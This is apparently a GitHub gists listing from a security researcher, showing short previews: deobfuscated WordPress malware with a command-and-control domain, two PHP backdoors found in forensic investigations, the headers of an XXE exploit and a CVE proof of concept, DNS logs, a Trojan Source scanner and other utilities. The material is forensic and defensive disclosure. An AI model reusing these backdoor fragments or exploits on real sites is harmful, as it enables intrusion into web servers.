Jonas Lejon jonaslejon
jonaslejon
/ wp-blog-header.php
Last active
July 7, 2018 14:38
Malware found on WordPress installation. This is the deobfuscated version
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php @error_reporting(0); | |
| define('cdomainDosNZ', "ssl-backup24.com"); | |
| define('showop_phpDosNZ', "showop_click.php"); | |
| define('info_phpDosNZ', 'info.php'); | |
| if (array_key_exists('HTTP_TEST', $_SERVER)) { | |
| echo (md5("TEST2016_CLICK")); | |
| exit; | |
| } | |
| function fetch_urlDosNZ($url, $data) { | |
| $content = ''; |
jonaslejon
/ _input__test.php.
Created
October 10, 2017 18:58
WordPress backdoor found during forensic investigation of blog. Was located in folder wp-content/uploads/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @package Joomla.Plugin.System | |
| * @since 1.5 | |
| * | |
| * | |
| */ | |
| class PluginJoomla { | |
| public function __construct() { | |
| $jq = @$_COOKIE['ContentJQ3']; |
jonaslejon
/ wp-uninstall.php
Created
April 8, 2018 19:16
WordPress backdoor found in file wp-uninstall.php
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| error_reporting(0); | |
| if (!isset($_SESSION['bajak'])) { | |
| $visitcount = 0; | |
| $web = $_SERVER["HTTP_HOST"]; | |
| $inj = $_SERVER["REQUEST_URI"]; | |
| $body = "ada yang inject \n$web$inj"; | |
| $safem0de = @ini_get('safe_mode'); | |
| if (!$safem0de) {$security= "SAFE_MODE = OFF";} | |
| else {$security= "SAFE_MODE = ON";}; | |
| $serper=gethostbyname($_SERVER['SERVER_ADDR']); |
jonaslejon
/ episploit.py
Last active
October 5, 2020 01:00
Episerver XXE Vulnerability - Exploit Episploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ## | |
| ## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below | |
| ## | |
| ## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below! | |
| ## | |
| ## Written by Jonas Lejon 2017-12-19 <[email protected]> https://triop.se | |
| ## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573 | |
| ## | |
| ## Usage: ./episploit.py <target> [file-to-read] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Resolver 1 Bahnhof | |
| 21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49) | |
| 21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49) |
jonaslejon
/ gist:229e96e45bcb527cdf63b8ee930687af
Last active
February 17, 2020 08:21
RSA PGP key for [email protected]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -----BEGIN PGP PUBLIC KEY BLOCK----- | |
| mQINBF5KTFIBEADRvxOAHWw/4xG1BBZvJiA8FXIC/2nu65CMVwyvWVgWkPskRi5A | |
| WcVvBDXUOkIzCliTi8Fq9qEgg9/VT7QjBBVlVXNGHI1Ps4VSQHjHFAjRjl8cfT6k | |
| j4NaOzDQk3G8k0y1+nAI5etDEMdDjCV1A2DQd6w8i15MJnKe2tax7DdGa6jh262s | |
| gByhyBmPlA3mww0qFSl3Fq6hQJPR+S9sLldT87IU/VNx7dbhj3gW+/DTS7CECwoU | |
| 3D3VGllo5xnY8upGnKqpJtyF82LElaWhANpOveCQu+fDrD/NiO47aOZd9XMqQaM9 | |
| Zavxs9mVWj7GZKFwfXM4EfXz4/MPH90/txODL/t8CDuH+YG3rFec9VyFjpunQHbE | |
| 5pvGiIdBhasEc6dbtpEbu2gsNpB1CsOCt85Nijyswlga74gI/RP7m+1xrnhytvxG | |
| cAqFpBt3woJprlX5W8CgxnVt4c5I7pf18+k31/UyBP1v4rkp06YUD/No5Np7BN4+ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| ## | |
| ## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3 | |
| ## | |
| ## This PoC was written by Jonas Lejon 2019-11-28 <[email protected]> https://triop.se | |
| ## Reported to Citrix 2017-10, patch released 2018-05 | |
| ## | |
| import requests | |
| import sys |
jonaslejon
/ custom.list.chroot
Last active
February 21, 2023 14:13
My custom Kali Linux package list for building the live ISO
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python-usb | |
| python3-usb | |
| mingw-w64 | |
| isc-dhcp-server | |
| bridge-utils | |
| libdbus-1-dev | |
| libdbus-glib-1-dev | |
| python3-venv | |
| dirbuster | |
| cmake |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * The base configuration for WordPress | |
| * | |
| * The wp-config.php creation script uses this file during the | |
| * installation. You don't have to use the web site, you can | |
| * copy this file to "wp-config.php" and fill in the values. | |
| * | |
| * This file contains the following configurations: | |
| * |
jonaslejon
/ find.sh
Created
November 3, 2021 07:14
Find Trojan Source unicode characters (CVE-2021-42694 and CVE-2021-42574.)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/bin/sh | |
| # Usage instructions: sh find.sh php|tr '\n' '; ' | |
| # Then copy and paste the output and execute it | |
| ext=$1 | |
| C="\u200E \u200F \u202A \u202B \u202C \u202D \u202E \u2066 \u2067 \u2068 \u2069 \u202C" | |
| for a in $C; do echo find . -type f -name \"*.$ext\" -exec grep -H \$\'$a\' {} \\\; ; done |